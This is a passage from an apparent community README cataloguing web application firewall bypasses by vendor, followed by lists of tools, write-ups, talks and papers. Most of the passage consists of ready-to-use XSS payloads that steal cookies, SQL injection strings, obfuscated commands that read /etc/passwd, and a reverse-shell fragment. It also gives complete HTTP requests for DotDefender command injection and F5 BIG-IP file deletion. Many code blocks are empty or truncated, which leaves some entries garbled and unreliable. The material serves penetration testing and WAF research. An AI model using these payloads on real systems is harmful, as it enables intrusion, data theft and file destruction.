xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
1'"><img/src/onerror=.1|alert``>
```
- [XSS Bypass](https://twitter.com/RakeshMane10/status/1109008686041759744) by [@RakeshMane10](https://twitter.com/rakeshmane10)
```
<svg/onload=alert()//
```
- [XSS Bypass](https://twitter.com/ArbazKiraak/status/1090654066986823680) by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
```
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`
```
- XSS Bypass by [@Ahmet Ümit](https://twitter.com/ahmetumitbayram)
```
<--`<img/src=` onerror=confirm``> --!>
```
- [XSS Bypass](https://twitter.com/le4rner/status/1146453980400082945) by [@Shiva Krishna](https://twitter.com/le4rner)
```
javascript:{alert`0`}
```
- [XSS Bypass](https://twitter.com/brutelogic/status/1147118371965755393) by [@Brute Logic](https://twitter.com/brutelogic)
```
<base href=//knoxss.me?
```
- [XSS Bypass](https://twitter.com/RenwaX23/status/1147130091031449601) by [@RenwaX23](https://twitter.com/RenwaX23) (Chrome only)
```
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
```
- [RCE Payload Detection Bypass](https://www.secjuice.com/web-application-firewall-waf-evasion/) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
```
cat$u+/etc$u/passwd$u
/bin$u/bash$u <ip> <port>
";cat+/etc/passwd+#
```
### Cloudbric
- [XSS Bypass](https://twitter.com/0xInfection/status/1212331839743873026) by [@0xInfection](https://twitter.com/0xinfection)
```
<a69/onclick=[1].findIndex(alert)>pew
```
### Comodo
- XSS Bypass by [@0xInfection](https://twitter.com/0xinfection)
```
<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
```
- SQLi by [@WAFNinja](https://waf.ninja)
```
0 union/**/select 1,version(),@@datadir
```
### DotDefender
- Firewall disable by (v5.0) by [@hyp3rlinx](http://hyp3rlinx.altervista.org)
```
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
<enabled>false</enabled>
```
- Remote Command Execution (v3.8-5) by [@John Dos](https://www.exploit-db.com/?author=1996)
```
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
```
- Persistent XSS (v4.0) by [@EnableSecurity](https://enablesecurity.com)
```
GET /c?a=<script> HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
<script>alert(1): aa
Keep-Alive: 300
```
- R-XSS Bypass by [@WAFNinja](https://waf.ninja)
```
```
- XSS Bypass by [@0xInfection](https://twitter.com/0xinfection)
```
alert
dragme
click
```
- GET - XSS Bypass (v4.02) by [@DavidK](https://www.exploit-db.com/?author=2741)
```
/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
```
- POST - XSS Bypass (v4.02) by [@DavidK](https://www.exploit-db.com/?author=2741)
```
```
- `clave` XSS (v4.02) by [@DavidK](https://www.exploit-db.com/?author=2741)
```
/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
```
### Fortinet Fortiweb
- `pcre_expression` unvaidated XSS by [@Benjamin Mejri](https://www.exploit-db.com/?author=7854)
```
/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
```
- CSP Bypass by [@Binar10](https://www.exploit-db.com/exploits/18840)
POST Type Query
```
POST //login-app.aspx HTTP/1.1
Host:
User-Agent:
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:
var1=datavar1&var2=datavar12&pad=
```
GET Type Query
```
http:///path?var1=vardata1&var2=vardata2&pad=
```
### F5 ASM
- XSS Bypass by [@WAFNinja](https://waf.ninja)
```
"/>a
```
### F5 BIG-IP
- XSS Bypass by [@WAFNinja](https://waf.ninja/)
```
```
- XSS Bypass by [@Aatif Khan](https://twitter.com/thenapsterkhan)
```
]>
&e;
```
- Directory Traversal by [@Anastasios Monachos](https://www.exploit-db.com/?author=2932)
Read Arbitrary File
```
/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd
```
Delete Arbitrary File
```
POST /tmui/Control/form HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
Content-Type: application/x-www-form-urlencoded
_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete
```
### F5 FirePass
- SQLi Bypass from [@Anonymous](https://www.exploit-db.com/?author=2168)
```
state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
```
### Imperva
- [XSS Bypass](https://twitter.com/smaury92/status/1422599636800450572) by [@smaury92](https://twitter.com/smaury92)
```html
```
- [XSS Bypass](https://twitter.com/0xInfection/status/1420046446095519749) by [@0xInfection](https://twitter.com/0xInfection)
```html
clickme
```
- [XSS Bypass](https://twitter.com/0xInfection/status/1364622858090016777) by [@0xInfection](https://twitter.com/0xInfection)
```html
click
```
- [XSS Bypass](https://twitter.com/0xInfection/status/1212331839743873026) by [@0xInfection](https://twitter.com/0xinfection)
```html
pew
```
- [XSS Bypass](https://twitter.com/_ugurercan/status/1188406765735632896) by [@ugurercan](https://twitter.com/_ugurercan)
```html
```
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
- XSS Bypass by [@David Y](https://twitter.com/daveysec)
```
```
- XSS Bypass by [@Emad Shanab](https://twitter.com/alra3ees)
```
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
- XSS Bypass by [@WAFNinja](https://waf.ninja)
```
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
```
- XSS Bypass by [@i_bo0om](https://twitter.com/i_bo0om)
```
```
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
```
```
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
```
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
```
- SQLi by [@Giuseppe D'Amore](https://www.exploit-db.com/?author=6413)
```
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
```
- [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991)
### Kona SiteDefender
- [XSS Bypass](https://twitter.com/XSaadAhmedX/status/1482398313227948034) by [@SaadAhmed](https://twitter.com/XSaadAhmedX)
```
%3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E
```
- [XSS Bypass](https://twitter.com/h1_kenan/status/1185826172308983808) by [@h1_kenan](https://twitter.com/h1_kenan)
```
asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie)
```
- [HTML Injection](https://hackerone.com/reports/263226) by [@sp1d3rs](https://twitter.com/h1_sp1d3rs)
```
%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E
```
- [XSS Bypass](https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c) by [@Jonathan Bouman](https://twitter.com/jonathanbouman)
```
```
- XSS Bypass by [@0xInfection](https://twitter.com/0xInfection)
```
```
- [XSS Bypass](https://hackerone.com/reports/263226) by [@sp1d3rs](https://twitter.com/h1_sp1d3rs)
```
%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E
```
- [XSS Bypass](https://twitter.com/fransrosen/status/1126963506723590148) by [@Frans Rosén](https://twitter.com/fransrosen)
```
@keyframes a{}b{animation:a;}
```
- [XSS Bypass](https://twitter.com/security_prince/status/1127804521315426304) by [@Ishaq Mohammed](https://twitter.com/security_prince)
```
```
### Profense
- [GET Type CSRF Attack](https://www.exploit-db.com/exploits/7919) by [@Michael Brooks](https://www.exploit-db.com/?author=628) (>= v.2.6.2)
Turn off Proface Machine
```
```
Add a proxy
```
```
- XSS Bypass by [@Michael Brooks](https://www.exploit-db.com/?author=628) (>= v.2.6.2)
```
https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"alert(document.cookie)
```
- [XSS Bypass](https://www.securityfocus.com/bid/35053/info) by [@EnableSecurity](https://enablesecurity.com) (>= v2.4)
```
%3CEvil%20script%20goes%20here%3E=%0AByPass
%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
```
### QuickDefense
- XSS Bypass by [@WAFNinja](https://waf.ninja/)
```
?
```
### Sucuri
- [XSS Bypass (POST Only)](https://twitter.com/brutelogic/status/1209086328383660033) by [@brutelogic](https://twitter.com/brutelogic)
```
```
- [Smuggling RCE Payloads](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
```
/???/??t+/???/??ss??
```
- [Obfuscating RCE Payloads](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
```
;+cat+/e'tc/pass'wd
c\\a\\t+/et\\c/pas\\swd
```
- [XSS Bypass](https://twitter.com/return_0x/status/1148605627180208129) by [@Luka](https://twitter.com/return_0x)
```
">
```
- [XSS Bypass](https://twitter.com/brutelogic/status/1148610104738099201) by [@Brute Logic](https://twitter.com/brutelogic)
```
data:text/html,
```
### StackPath
- [XSS Bypass](https://twitter.com/0xInfection/status/1298642820664823808) by [@0xInfection](https://twitter.com/0xInfection)
```
### URLScan
- [Directory Traversal](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt#L557) by [@ZeQ3uL](http://www.exploit-db.com/author/?a=1275) (<= v3.1) (Only on ASP.NET)
```
http://host.com/test.asp?file=.%./bla.txt
```
### WebARX
- Cross Site Scripting by [@0xInfection](https://twitter.com/0xinfection)
```
rightclickhere
```
- [Bypassing All Protections Using A Whitelist String](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/) by [@Osanda Malith](https://twitter.com/OsandaMalith)
- XSS PoC
```
http://host.com/?vulnparam=alert()&ithemes-sync-request
```
- LFI PoC
```
http://host.com/?vulnparam=../../../../../etc/passwd&ithemes-sync-request
```
- SQLi PoC
```
http://host.com/?vulnparam=1%20unionselect%20@@version,2--&ithemes-sync-request
```
### WebKnight
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
```
```
- SQLi by [@WAFNinja](https://waf.ninja)
```
0 union(select 1,username,password from(users))
0 union(select 1,@@hostname,@@datadir)
```
- XSS Bypass by [@Aatif Khan](https://twitter.com/thenapsterkhan) (v4.1)
```
```
- [SQLi Bypass](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt#L562) by [@ZeQ3uL](http://www.exploit-db.com/author/?a=1275)
```
10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
```
### Wordfence
- XSS Bypass by [@brute Logic](https://twitter.com/brutelogic)
```
```
- XSS Bypass by [@0xInfection](https://twitter.com/0xInfection)
```
click
```
- [HTML Injection](https://www.securityfocus.com/bid/69815/info) by [@Voxel](https://www.exploit-db.com/?author=8505)
```
http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
```
- [XSS Exploit](https://www.securityfocus.com/bid/56159/info) by [@MustLive](https://www.exploit-db.com/?author=1293) (>= v3.3.5)
```
Wordfence Security XSS exploit (C) 2012 MustLive.
http://websecurity.com.ua
```
- [Other XSS Bypasses](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md)
```
>
>>
```
### Apache Generic
- Writing method type in lowercase by [@i_bo0om](http://twitter.com/i_bo0om)
```
get /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```
### IIS Generic
- Tabs before method by [@i_bo0om](http://twitter.com/i_bo0om)
```
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```
## Awesome Tools
### Fingerprinting:
- [WAFW00F](https://github.com/enablesecurity/wafw00f) - The ultimate WAF fingerprinting tool with the largest fingerprint database from [@EnableSecurity](https://github.com/enablesecurity).
- [IdentYwaf](https://github.com/stamparm/identywaf) - A blind WAF detection tool which utlises a unique method of identifying WAFs based upon previously collected fingerprints by [@stamparm](https://github.com/stamparm).
### Testing:
- [GoTestWAF](https://github.com/wallarm/gotestwaf) - A tool to test a WAF's detection logic and bypasses from [@wallarm](https://github.com/wallarm).
- [Lightbulb Framework](https://github.com/lightbulb-framework/lightbulb-framework) - A WAF testing suite written in Python.
- [WAFBench](https://github.com/microsoft/wafbench) - A WAF performance testing suite by [Microsoft](https://github.com/microsoft).
- [WAF Testing Framework](https://www.imperva.com/lg/lgw_trial.asp?pid=483) - A WAF testing tool by [Imperva](https://imperva.com).
- [Framework for Testing WAFs (FTW)](https://github.com/coreruleset/ftw) - A framework by the [OWASP CRS team](https://coreruleset.org/) that helps to provide rigorous tests for WAF rules by using the OWASP Core Ruleset V3 as a baseline.
### Evasion:
- [WAFNinja](https://github.com/khalilbijjou/wafninja) - A smart tool which fuzzes and can suggest bypasses for a given WAF by [@khalilbijjou](https://github.com/khalilbijjou/).
- [WAFTester](https://github.com/Raz0r/waftester) - Another tool which can obfuscate payloads to bypass WAFs by [@Raz0r](https://github.com/Raz0r/).
- [libinjection-fuzzer](https://github.com/migolovanov/libinjection-fuzzer) - A fuzzer intended for finding `libinjection` bypasses but can be probably used universally.
- [bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history) - A tool which searches for old DNS records for finding actual site behind the WAF.
- [abuse-ssl-bypass-waf](https://github.com/LandGrey/abuse-ssl-bypass-waf) - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs.
- [SQLMap Tamper Scripts](https://github.com/sqlmapproject/sqlmap) - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs.
- [Bypass WAF BurpSuite Plugin](https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c) - A plugin for Burp Suite which adds some request headers so that the requests seem from the internal network.
- [enumXFF](https://github.com/infosec-au/enumXFF) - Eumerating IPs in X-Forwarded-Headers to bypass 403 restrictions
- [WAF Bypass Tool](https://github.com/nemesida-waf/waf-bypass) - WAF bypass Tool from Nemesida is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads.
### Management:
- [AWS Firewall Factory](https://github.com/globaldatanet/aws-firewall-factory) - Deploy, update, and stage your WAFs while managing them centrally via FMS.
## Blogs and Writeups
> Many of the content mentioned above have been taken from some of the following excellent writeups.
- [Web Application Firewall (WAF) Evasion Techniques #1](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) - By [@Secjuice](https://www.secjuice.com).
- [Web Application Firewall (WAF) Evasion Techniques #2](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) - By [@Secjuice](https://www.secjuice.com).
- [Web Application Firewall (WAF) Evasion Techniques #3](https://www.secjuice.com/web-application-firewall-waf-evasion/) - By [@Secjuice](https://www.secjuice.com).
- [How To Exploit PHP Remotely To Bypass Filters & WAF Rules](https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/)- By [@Secjuice](https://secjuice.com)
- [ModSecurity SQL Injection Challenge: Lessons Learned](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/modsecurity-sql-injection-challenge-lessons-learned/) - By [@SpiderLabs](https://trustwave.com).
- [XXE that can Bypass WAF](https://lab.wallarm.com/xxe-that-can-bypass-waf-protection-98f679452ce0) - By [@WallArm](https://labs.wallarm.com).
- [SQL Injection Bypassing WAF](https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF) - By [@OWASP](https://owasp.com).
- [How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing](https://www.sunnyhoi.com/reverse-engineer-web-application-firewall-using-regular-expression-reversing/) - By [@SunnyHoi](https://twitter.com/sunnyhoi).
- [Bypassing Web-Application Firewalls by abusing SSL/TLS](https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) - By [@0x09AL](https://twitter.com/0x09al).
- [Request Encoding to Bypass WAFs](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request-encoding-to-bypass-web-application-firewalls/) - By [@Soroush Dalili](https://twitter.com/irsdl)
## Video Presentations
- [WAF Bypass Techniques Using HTTP Standard and Web Servers Behavior](https://www.youtube.com/watch?v=tSf_IXfuzXk) from [@OWASP](https://owasp.org).
- [Confessions of a WAF Developer: Protocol-Level Evasion of Web App Firewalls](https://www.youtube.com/watch?v=PVVG4rCFZGU) from [BlackHat USA 12](https://blackhat.com/html/bh-us-12).
- [Web Application Firewall - Analysis of Detection Logic](https://www.youtube.com/watch?v=dMFJLicdaC0) from [BlackHat](https://blackhat.com).
- [Bypassing Browser Security Policies for Fun & Profit](https://www.youtube.com/watch?v=P5R4KeCzO-Q) from [BlackHat](https://blackhat.com).
- [Web Application Firewall Bypassing](https://www.youtube.com/watch?v=SD7ForrwUMY) from [Positive Technologies](https://ptsecurity.com).
- [Fingerprinting Filter Rules of Web Application Firewalls - Side Channeling Attacks](https://www.usenix.org/conference/woot12/workshop-program/presentation/schmitt) from [@UseNix](https://www.usenix.com).
- [Evading Deep Inspection Systems for Fun and Shell](https://www.youtube.com/watch?v=BkmPZhgLmRo) from [BlackHat US 13](https://blackhat.com/html/bh-us-13).
- [Bypass OWASP CRS && CWAF (WAF Rule Testing - Unrestricted File Upload)](https://www.youtube.com/watch?v=lWoxAjvgiHs) from [Fools of Security](https://www.youtube.com/channel/UCEBHO0kD1WFvIhf9wBCU-VQ).
- [WAFs FTW! A modern devops approach to security testing your WAF](https://www.youtube.com/watch?v=05Uy0R7UdFw) from [AppSec USA 17](https://www.youtube.com/user/OWASPGLOBAL).
- [Web Application Firewall Bypassing WorkShop](https://www.youtube.com/watch?v=zfBT7Kc57xs) from [OWASP](https://owasp.com).
- [Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch](https://www.youtube.com/watch?v=dWLpw-7_pa8) from [Rafay Bloch](http://rafaybaloch.com).
- [WTF - WAF Testing Framework](https://www.youtube.com/watch?v=ixb-L5JWJgI) from [AppSecUSA 13](https://owasp.org).
- [The Death of a Web App Firewall](https://www.youtube.com/watch?v=mB_xGSNm8Z0) from [Brian McHenry](https://www.youtube.com/channel/UCxzs-N2sHnXFwi0XjDIMTPg).
- [Adventures with the WAF](https://www.youtube.com/watch?v=rdwB_p0KZXM) from [BSides Manchester](https://www.youtube.com/channel/UC1mLiimOTqZFK98VwM8Ke4w).
- [Bypassing Intrusion Detection Systems](https://www.youtube.com/watch?v=cJ3LhQXzrXw) from [BlackHat](https://blackhat.com).
- [Building Your Own WAF as a Service and Forgetting about False Positives](https://www.youtube.com/watch?v=dgqUcHprolc) from [Auscert](https://conference.auscert.org.au).
## Presentations & Research Papers
### Research Papers:
- [Protocol Level WAF Evasion](papers/Qualys%20Guide%20-%20Protocol-Level%20WAF%20Evasion.pdf) - A protocol level WAF evasion techniques and analysis by [Qualys](https://www.qualys.com).
- [Neural Network based WAF for SQLi](papers/Artificial%20Neural%20Network%20based%20WAF%20for%20SQL%20Injection.pdf) - A paper about building a neural network based WAF for detecting SQLi attacks.
- [Bypassing Web Application Firewalls with HTTP Parameter Pollution](papers/Bypassing%20Web%20Application%20Firewalls%20with%20HTTP%20Parameter%20Pollution.pdf) - A research paper from [Exploit DB](https://exploit-db.com) about effectively bypassing WAFs via HTTP Parameter Pollution.
- [Poking A Hole in the Firewall](papers/Poking%20A%20Hole%20In%20The%20Firewall.pdf) - A paper by [Rafay Baloch](https://www.rafaybaloch.com) about modern firewall analysis.
- [Modern WAF Fingerprinting and XSS Filter Bypass](papers/Modern%20WAF%20Fingerprinting%20and%20XSS%20Filter%20Bypass.pdf) - A paper by [Rafay Baloch](https://www.rafaybaloch.com) about WAF fingerprinting and bypassing XSS filters.
- [WAF Evasion Testing](papers/SANS%20Guide%20-%20WAF%20Evasion%20Testing.pdf) - A WAF evasion testing guide from [SANS](https://www.sans.org).
- [Side Channel Attacks for Fingerprinting WAF Filter Rules](papers/Side%20Channel%20(Timing)%20Attacks%20for%20Fingerprinting%20WAF%20Rules.pdf) - A paper about how side channel attacks can be utilised to fingerprint firewall filter rules from [UseNix Woot'12](https://www.usenix.org/conference/woot12).
- [WASC WAF Evaluation Criteria](papers/WASC%20WAF%20Evaluation%20Criteria.pdf) - A guide for WAF Evaluation from [Web Application Security Consortium](http://www.webappsec.org).
- [WAF Evaluation and Analysis](papers/Web%20Application%20Firewalls%20-%20Evaluation%20and%20Analysis.pdf) - A paper about WAF evaluation and analysis of 2 most used WAFs (ModSecurity & WebKnight) from [University of Amsterdam](http://www.uva.nl).
- [Bypassing all WAF XSS Filters](papers/Evading%20All%20Web-Application%20Firewalls%20XSS%20Filters.pdf) - A paper about bypassing all XSS filter rules and evading WAFs for XSS.
- [Beyond SQLi - Obfuscate and Bypass WAFs](papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt) - A research paper from [Exploit Database](https://exploit-db.com) about obfuscating SQL injection queries to effectively bypass WAFs.
- [Bypassing WAF XSS Detection Mechanisms](papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf) - A research paper about bypassing XSS detection mechanisms in WAFs.
### Presentations:
- [Methods to Bypass a Web Application Firewall](presentrations/Methods%20To%20Bypass%20A%20Web%20Application%20Firewall.pdf) - A presentation from [PT Security](https://www.ptsecurity.com) about bypassing WAF filters and evasion.
- [Web Application Firewall Bypassing (How to Defeat the Blue Team)](presentation/Web%20Application%20Firewall%20Bypassing%20(How%20to%20Defeat%20the%20Blue%20Team).pdf) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by [@OWASP](https://owasp.org).
- [WAF Profiling & Evasion Techniques](presentations/OWASP%20WAF%20Profiling%20&%20Evasion.pdf) - A WAF testing and evasion guide from [OWASP](https://www.owasp.org).
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
- [Side Channel Attacks for Fingerprinting WAF Filter Rules](presentations/Side%20Channel%20Attacks%20for%20Fingerprinting%20WAF%20Filter%20Rules.pdf) - A presentation about how side channel attacks can be utilised to fingerprint firewall filter rules from [UseNix Woot'12](https://www.usenix.org/conference/woot12).
- [Our Favorite XSS Filters/IDS and how to Attack Them](presentations/Our%20Favourite%20XSS%20WAF%20Filters%20And%20How%20To%20Bypass%20Them.pdf) - A presentation about how to evade XSS filters set by WAF rules from [BlackHat USA 09](https://www.blackhat.com/html/bh-us-09/).
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
- [A Forgotten HTTP Invisibility Cloak](presentation/A%20Forgotten%20HTTP%20Invisibility%20Cloak.pdf) - A presentation about techniques that can be used to bypass common WAFs from [BSides Manchester](https://www.bsidesmcr.org.uk/).
- [Building Your Own WAF as a Service and Forgetting about False Positives](presentations/Building%20Your%20Own%20WAF%20as%20a%20Service%20and%20Forgetting%20about%20False%20Positives.pdf) - A presentation about how to build a hybrid mode waf that can work both in an out-of-band manner as well as inline to reduce false positives and latency [Auscert2019](https://conference.auscert.org.au/).
## Credits & License:
Initial fingerprint compilation and bypasses were put together by [Pinaki](https://twitter.com/0xInfection) [(0xInfection)](https://github.com/0xinfection), but now it largely remains as a community supported repository. Awesome-WAF is licensed under the [Apache 2.0 License](LICENSE).